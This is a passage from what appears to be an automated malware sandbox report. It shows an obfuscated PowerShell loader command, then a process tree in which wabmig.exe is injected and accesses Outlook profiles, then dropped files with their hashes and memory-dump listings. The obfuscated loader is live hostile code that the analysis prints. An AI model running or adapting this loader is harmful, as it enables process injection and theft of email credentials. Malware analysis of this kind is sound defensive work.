truaAagerrSnrestClose-RejseSNephrlOsteoeNytnkeExhump Nult Whi 4circu ');Fiskesnrer (Dioxinskandale 'Reani$RaaklgSlimslOzonioEetshbAr usa .hatlRy te:RelatAalbinlAccusbUnabraO erstCutler gyrooKaleis Tj.rsVate.eCoa mrKegbenKisteeHus,osLefth1 ale7Fla i8Sp.ek=Polyp(B.yggTR,poreKlagesstrogt Yded-VinaiP AlunaUdpretsta nhEcosp lunef$InterSIntelunonpob KinejTilbau kremg fgasaedaphtUndiseGru,dd Regr)Reear ') ;Fiskesnrer (Dioxinskandale 'Domin$ K segS,rhelTricioFli tb ScroaServilFlyru:HippuJPriofa kartgDecise Ant sUncar=Unbas$.ngerg rodl I reoObjekbUndvia ncolno sy:StinkKRya,sl RefooStelekSvolvk GigaeUndissVocatt sacar Laare Gla nVillig Af ne Unde+Micr.+G ask%Indla$In hrLPretei UndrsF.reteBe ral AtleoMonomtenlistPellaeVaer,s Syno.,ebricbefudodustcuExclunOpkastArthr ') ;$Unguilefully=$Liselottes[$Jages];}$Mimicry=338077;$galvanisrs=28474;Fiskesnrer (Dioxinskandale 'Hyp a$ RantgAnatol .eceoUd.edbNa uraTipsplB nea:SarcoAHaskanAut ptS upeiLaanenMegafaUnc izPhreniPlenusclinotWhitiiVikt sGravskAcylae pfin unenf= Retr DomicG efleeForlitAnobi-fdrenCSkrifoDeduknColoutRhodieFluohn irevt Anke Sakar$AlkohSBereauAni,abSoljej Ov ruCo tagDeraiaGazelt Kwa,e Vil d cran ');Fiskesnrer (Dioxinskandale 'Bombe$KortfgUpsitlDe isoAsclebSystea Portlschi : IlliBM.ckhe,ciosvvo.iebF.arenFut,re CucunAktiedUsynleVu des,lagt2F avo3 Rave5U pos Bytt =Linea In u[De arSEves ySupersVejl t apuneKlunsmFonds.UdlejC PuzzoConfon eabovUnlene ForsrT,mintinstr] Kolo: Indh: Kr dFsy anrLeveroAmphimPrimeB VoldaNar osNettoeIl ib6Konsp4 ontoSta aetBogtrr SuspiParavnClau.gBrand(palmi$ StorAGoesfnBugentSyenoiSampln P ddaPr.sezSysteiSys esEtnoltUbl giForhasBoykok Med e ypi)Allde ');Fiskesnrer (Dioxinskandale 'Udvin$Nond,g SamflQuod oAmtstb acka BesklSam,e:OscilNbetonomagnenSomerlTro,buPolstcColdsrAtt caMe hit Co piRutylvAhoy eStueanCruise P.rfs V,susKisse Datad=Armou Undvr[ itraSGloveyChands Su etReb ye,opsemInter.ColchT NonheCai uxAvocatTre c.RutscELace n S lvc ostmoTiberdLineaiFeltdnInddeg Fre.]Rytte:Eugle:Absu A clipSGrafsCbagerINagesIRente.Tr.ckGdg fleSpiontO.gonSWheeptBeck r Akk iAutornLakelgDesor(Stylo$.onliB MilieTitanvWandeb PhotnSupereGemulnAsserd HaaneTschesSubli2Bla e3Don r5S gfr)Indgi ');Fiskesnrer (Dioxinskandale 'Langi$Klan gloplulCe leoResocb ,uidaOpposlFurr :PectiIHedwinInstrd SeediVikinvAvendiDun id,dkass Multk ,vinr,flggm MelleSkorpnV ndmeL,ggisWinte=Bogsi$ForebN milloDdmann themlVolvauAfkldcThorirRbestaIn.ert SlgeiAfkobvBrolbemun enBackheIolits ReapsApart.Male sTeartu LixibDead.s NegetH oper Kon i landnDuctigTyver( tors$Aare MPelodi IllumT ldaiBrugec.illirExcreyK.esk,Klvni$Domstg,eksaaYippilRengjv Eng aMonocnBe uriJeblisbr tarGeotrsMisad)Ha.ef ');Fiskesnrer $Individskrmenes;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2640
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cheapnesses.und && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1056
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:1924

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      a9cc398797af32a896c076dcd4029b9e

      SHA1

      3035d4bd03f6c4a67d3e17309de01c08c2b2c308

      SHA256

      045a42676586c97dd7e2efc5f833cf9a49ec348fda5657372272575a789fc70d

      SHA512

      74cbdb5c1c207226fe0f5fbd7ef4c7d6cc8bd4862bfe8686b9bc87d08d69d086086f7cad8bdfb2767ee9baa4562d21f406bdba3d941276439a3277d208f23f18

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\CabB4D0.tmp
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar345A.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Cheapnesses.und
      Filesize

      477KB

      MD5

      ebe404d748e78378d1809d2a1cce86ac

      SHA1

      437870b85f3f4b1b36400837989c4d8eb7f07e12

      SHA256

      c4577397c1007c51e44033fb3c9931ae9371bca4adf06e087a8af067708a86bb

      SHA512

      c31a6ce4055920b587ee571c85dcd303a28ca430b920079512784a0646caf1f28889f17a70bc4b7d6cf16bbee43a43f237fd012e7a3377cf0b4bbe94364bd280

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4177215427-74451935-3209572229-1000\0f5007522459c86e95ffcc62f32308f1_bf99bef1-312f-4726-8597-70228ef05e99
      Filesize

      46B

      MD5

      d898504a722bff1524134c6ab6a5eaa5

      SHA1

      e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

      SHA256

      878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

      SHA512

      26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4177215427-74451935-3209572229-1000\0f5007522459c86e95ffcc62f32308f1_bf99bef1-312f-4726-8597-70228ef05e99
      Filesize

      46B

      MD5

      c07225d4e7d01d31042965f048728a0a

      SHA1

      69d70b340fd9f44c89adb9a2278df84faa9906b7

      SHA256

      8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

      SHA512

      23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GH0L5CF2YSJ13Y3U6E4Z.temp
      Filesize

      7KB

      MD5

      18defd07ed032afd38c4d21f2937b163

      SHA1

      b28f3ddb54d01488944d26c1f352c95763d05c7f

      SHA256

      e3b9cba04b8ea438789f1f353623674adaa2109c3a63526809114329bf67c116

      SHA512

      b99b3310fdcd71129b6fbbc709b59071db155f16cab13ed6c344752494a1b7d71bad8b5abce68cf28f28f130b2ed734ead7cdd532dd6af3c066e7915608e8db2

      Download Submit

    • memory/1796-26-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1796-64-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1796-28-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1796-30-0x000007FEF58AE000-0x000007FEF58AF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1796-31-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1796-32-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1796-25-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1796-24-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1796-20-0x000007FEF58AE000-0x000007FEF58AF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1796-21-0x000000001B640000-0x000000001B922000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/1796-22-0x0000000001F70000-0x0000000001F78000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1796-23-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1796-27-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1924-62-0x0000000000400000-0x0000000000581000-memory.dmp

      Filesize

      1.5MB

      Download

    • memory/1924-63-0x0000000000FE0000-0x0000000003E4D000-memory.dmp

      Filesize

      46.4MB

      Download

    • memory/1924-38-0x0000000000FE0000-0x0000000003E4D000-memory.dmp

      Filesize

      46.4MB

      Download

    • memory/2640-37-0x0000000006640000-0x00000000094AD000-memory.dmp

      Filesize

      46.4MB

      Download